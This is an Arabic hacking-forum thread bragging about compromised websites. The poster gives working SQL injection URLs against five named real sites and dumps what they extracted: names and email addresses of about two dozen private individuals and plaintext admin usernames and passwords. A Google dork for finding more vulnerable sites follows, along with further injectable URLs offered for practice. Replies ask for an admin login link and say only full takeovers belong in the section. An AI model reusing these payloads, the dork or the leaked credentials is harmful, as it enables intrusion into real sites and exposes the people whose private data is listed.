:: vBspiders Professional Network :: - مواقع مصابة مع استغلال بعضها

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- Hackers Showoff (http://www.vbspiders.com/vb/forumdisplay.php?f=91)

- - مواقع مصابة مع استغلال بعضها (http://www.vbspiders.com/vb/showthread.php?t=22869)

مواقع مصابة مع استغلال بعضها

السلام عليكم
-----------------------------------------------------
اقدم بداية اعتذاري على الموقع الاباحي الدي وضعته في مشاركة سابقة.
-----------------------------------------------------
الموقع الأول
http://www.lucienkrief.co.il
الاستغلال

كود PHP:

   http://www.lucienkrief.co.il/showArtist.php?id=-43%20union%20all%20select%20group_concat%28name,0x3a,email%29,2%20from%20register--

بعض المعلومات
Rosenbach:urosen10@hotmail.com
dan:dan@atarim.co.il
Gad:gad@atarim.com
Nissim:nissim@lucienkrief.co.il
Brian R. Burr:bb@scanasset.com
atarim:atarim@atarim.com
Lisa Matisoff:lmatisoff@hotmail.com
Yehuda:yshemtov@earthlink.net
Bob Vinitsky:bob_vinitsky@yahoo.com
elsa:edj@zahav.co.il
NEAL J. NISSEL:NEAL@NISSELCPA.COM
Anna Bronshtein:annushka15@hotmail.com
Alex Usatch:ousatch@cms.vinnica.ua
j:j@yahoo.com
Karen Zoller:Kazzzzzzz@msn.com
Harris Bak:harris.bak@milliman.com
jl slotin:jsbroadway@aol.com
Nikki Irving:NikIrving@yahoo.com
deena ganger:deenrsnbrgD@AOL.COM
xuy s bugra:xuy@email.com
Samuel Freed:samuelfreed@aol.com
Hillel Kirschner:hillel@elegantheadwear.com
Rabbi Pinny:RabbiPinny@aol.com
jill naviasky:jill_w@bayardad.com
---------------------------------------------------------
الموقع الثاني
http://www.hispanicprwire.com
الاستغلال

كود PHP:

   http://www.hispanicprwire.com/news.php?l=in&id=-2840%20union%20all%20select%201,2,3,group_concat%28Login,0x3a,Password%29,5,6,7,8,9,10%20from%20HPR_Extenal_User--

المعلومات
alberto:alberto

الموقع الثالث وهو شبه كامل

كود PHP:

   http://www.snseurope.com/snslink/news/news-full.php?id=-13508%20UNION%20SELECT%201,2,group_concat%28password,0x3a,email%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20eas_database--

الموقع الرابع

كود PHP:

   http://www.mynhw.co.uk/news-full.php?id=-324%20union%20all%20select%201,2,database%28%29,4,5,6,7,8,9,10,11,12,13--

للحصول على معلومات الأدمن

كود PHP:

   http://www.mynhw.co.uk/news-full.php?id=-324%20union%20all%20select%201,2,group_concat%28vAdminName,0x3a,vPassword%29,4,5,6,7,8,9,10,11,12,13%20from%20csc_admin--

الموقع الخامس

كود PHP:

   http://c2-europe.eu/news-full.php?id=-323%20union%20all%20select%201,2,3,group_concat%28username,0x3a,password%29,5,6,7,8,9,10,11,12,13,14%20from%20admin--

معلومات الأدمن
michael:5ejufe
franz:ba3uju
nora:v6xup3
seb:t2e5ab
rod:ga3ra4
nadine:6uraha

اخيرا اليكم الدروك الذي استعملته للحصول على بعض هذه المواقع

كود PHP:

   inurl:news-full.php?id=

وهذه مواقع اخرى مصابة لمن يريد ان يتمرن

كود PHP:

   http://www.chrecruitment.co.uk/news.full.php?id=92%27

كود PHP:

   http://www.c2-deutschland.de/news-full.php?id=157%27

كود PHP:

   http://www.novazora.eu/news-full.php?id=21%27&start=0%27

لكم تحياتي

ماشاء الله عليك اخي
ممكن تعطيني رابط الدخول الى لوحة التحكم لهذا الموقع ؟؟؟

http://www.mynhw.co.uk/news-full.php...%20csc_admin--

بصراحة اتحييت من اغلاق المواضيع المخالفة هدا قسم الانجازات يا عالم يعني اختراق كامل ...
مش تجيب اعمدة وجداول وباسووردات مشفرة تضع موضوع ...

لو كان الامر هكدا كنت انا اولكم واضع كل يوم 100 موقع ... بس مش هيك

ادا الاختراق كامل يعني مسيطر على الموقع اهلا وسهلا ... اتمنى يكون المسج وصل للجميع بدون استثناء

اسف على هدا الكلام الجاف بس اشوف ان القسم يتدهور وحطيت قانون ومع دلك لا حد راضي يطبقه ..

الامر بيد الادارة

Adiooooos